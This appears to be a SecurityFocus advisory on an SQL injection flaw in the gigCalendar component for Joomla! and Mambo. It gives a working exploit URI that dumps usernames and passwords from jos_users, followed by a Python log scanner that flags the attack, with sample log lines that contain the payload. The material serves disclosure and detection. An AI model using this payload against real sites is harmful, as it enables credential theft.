
Joomla! and Mambo gigCalendar Component 'banddetails.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1' UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23
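
For defenders reviewing web server logs, the following added example (not part of the original advisory and not the component's own code) flags requests to com_gigcal whose gigcal_bands_id value is not a plain integer. The log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration; not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2009:10:00:00 +0000] "GET /path/index.php'
    '?option=com_gigcal&task=details&gigcal_bands_id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2009:10:00:05 +0000] "GET /path/index.php'
    '?option=com_gigcal&task=details&gigcal_bands_id=-1%27%20UNION%20ALL'
    '%20SELECT%201,2,3%20from%20jos_users%23 HTTP/1.1" 200 7344',
    '198.51.100.9 - - [01/Jan/2009:10:00:09 +0000] "GET /path/index.php'
    '?option=com_content&id=3 HTTP/1.1" 200 2048',
    '203.0.113.4 - - [01/Jan/2009:10:01:00 +0000] "GET /path/index.php'
    '?option=com_gigcal&task=details&gigcal_bands_id= HTTP/1.1" 200 900',
]

# Request line inside the quoted field; tolerates unencoded spaces in the URI.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')


def band_id_is_valid(value):
    """Allow-list check: a band id must be 1 to 10 ASCII digits, nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def suspicious_requests(lines):
    """Return (client_ip, decoded_value) for com_gigcal requests with a bad id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_gigcal" not in query.get("option", []):
            continue
        # Check every occurrence, so a repeated parameter cannot hide a bad value.
        for value in query.get("gigcal_bands_id", []):
            if not band_id_is_valid(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\tgigcal_bands_id={value!r}")
```

The same allow-list rule (digits only) is the input check the component should apply before the value reaches a query, ideally combined with a parameterized statement.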







 

Copyright 2008, SecurityFocus